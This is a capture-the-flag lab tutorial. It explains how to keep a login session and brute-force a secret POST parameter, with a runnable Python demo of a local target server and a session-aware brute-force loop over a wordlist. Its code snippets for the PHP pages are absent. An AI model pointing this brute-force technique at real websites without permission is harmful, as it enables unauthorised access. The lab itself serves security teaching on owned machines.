In Lab 13, we built a webpage that does the following:
- Allows the user to log in using a set of hard-coded credentials (this isn't good and should never be done in a real application).
- Sets and checks a session variable that lets the web server determine whether the credentials were entered correctly on the login page.
This lab extends that web application into the kind of CTF challenge you might encounter in a competitive event.
Let’s add a check to hackme.php that does the following:
- If the user is logged in (the session variable set by the login page is present and valid):
  - The web server looks for a secret POST parameter value.
  - If the POST parameter value is correct, it reveals the flag.
- The flag is never revealed if the user is not logged in, regardless of what is POSTed. The session check must run before the parameter comparison, not after it.
Modify hackme.php to look like this:

Let’s write the exploit code next.
First, you’ll want to create a folder on your Kali Linux VM called Lab_14 and, inside it, a file called session_brute.py.
Copy raft-small-words.txt to this folder or grab it (it ships with SecLists under Discovery/Web-Content; on Kali, `apt install seclists` puts it in /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt).
Your Lab_14 folder should now contain both files; running ls there should list session_brute.py and raft-small-words.txt.

Any time you brute-force a website that requires you to have an established session, you’ll want to identify the form fields that are used when the user logs in to create that session. Your script has to submit those fields once, capture the session cookie the server sets on a successful login, and then replay that cookie on every guess it sends to hackme.php; without it, the session check fails and the flag comparison never runs. Here is what our index.php looks like if we ‘view page source’ in our web browser.

Based on this, we know the following:
- The data is sent via a POST request to check.php (<form method="post">)
- The first field is called ‘username’
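The two halves of this lab, the server-side check in hackme.php and the session-aware brute force in session_brute.py, together as one runnable example. This is added demo code, not the lab's own PHP or its session_brute.py: the target is a stand-in for index.php/check.php/hackme.php written with Python's http.server so it runs offline without Apache or PHP. The route names, the field names (username, password), the secret parameter name (secret), the credentials, the flag and the short stand-in wordlist are all assumptions chosen for the demo; in the lab you would read raft-small-words.txt and point the script at your own VM.

```python
"""Session-aware POST brute force against a stand-in target (added example).

Assumptions (not from the lab page): routes /check.php and /hackme.php, form
fields 'username' and 'password', secret parameter 'secret', and the flag text.
"""
import http.cookiejar
import http.cookies
import secrets
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# --- constructed target, standing in for check.php / hackme.php ----------------
VALID_USER, VALID_PASS = "admin", "password123"    # hard-coded creds (demo only)
SECRET_PARAM, SECRET_VALUE = "secret", "backup"    # assumed parameter name/value
FLAG = "flag{demo_session_brute}"                  # constructed flag
_logged_in = set()                                 # session ids that passed check.php
_lock = threading.Lock()


class Target(BaseHTTPRequestHandler):
    def log_message(self, *args):                  # keep the demo quiet
        pass

    def _form(self):
        n = int(self.headers.get("Content-Length", 0))
        raw = self.rfile.read(n).decode() if n else ""
        return {k: v[0] for k, v in urllib.parse.parse_qs(raw).items()}

    def _session_id(self):
        jar = http.cookies.SimpleCookie(self.headers.get("Cookie", ""))
        return jar["PHPSESSID"].value if "PHPSESSID" in jar else None

    def _reply(self, body, extra_headers=None):
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        for k, v in (extra_headers or {}).items():
            self.send_header(k, v)
        self.end_headers()
        self.wfile.write(body.encode())

    def do_POST(self):
        form = self._form()
        if self.path == "/check.php":              # login: set the session on success
            if form.get("username") == VALID_USER and form.get("password") == VALID_PASS:
                sid = secrets.token_hex(16)
                with _lock:
                    _logged_in.add(sid)
                self._reply("Login OK", {"Set-Cookie": f"PHPSESSID={sid}; Path=/"})
            else:
                self._reply("Login failed")
        elif self.path == "/hackme.php":           # session check first, then the secret
            with _lock:
                authed = self._session_id() in _logged_in
            if not authed:
                self._reply("Please log in first")  # flag never shown unauthenticated
            elif form.get(SECRET_PARAM) == SECRET_VALUE:
                self._reply(f"Well done! {FLAG}")
            else:
                self._reply("Nope")
        else:
            self.send_error(404)


def start_target():
    """Start the stand-in target on a free localhost port; returns (server, base_url)."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), Target)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_port}"


# --- attacker side: what session_brute.py has to do ---------------------------
def post(client, url, data):
    body = urllib.parse.urlencode(data).encode()
    with client.open(urllib.request.Request(url, data=body, method="POST")) as r:
        return r.read().decode()


def brute_force_secret(base_url, username, password, wordlist,
                       param=SECRET_PARAM, marker="flag{"):
    """Log in once, then POST each candidate as `param` to hackme.php inside that
    same session (the cookie jar replays PHPSESSID automatically).
    Returns (candidate, response) for the first hit, or None."""
    client = urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(http.cookiejar.CookieJar()))
    post(client, base_url + "/check.php", {"username": username, "password": password})
    for word in wordlist:                          # accepts a list or an open file
        word = word.strip()
        if not word:
            continue
        resp = post(client, base_url + "/hackme.php", {param: word})
        if marker in resp:
            return word, resp
    return None


if __name__ == "__main__":
    srv, base = start_target()
    words = ["admin", "test", "index", "backup", "config"]  # constructed stand-in wordlist
    print(brute_force_secret(base, VALID_USER, VALID_PASS, words))
    srv.shutdown()
```

Against the real lab VM you would drop the Target class, set base_url to your web server, and pass open("raft-small-words.txt") as the wordlist; the brute_force_secret loop is unchanged. The marker string is whatever distinguishes the flag response from the "wrong guess" response, so check one failed request by hand before trusting a match.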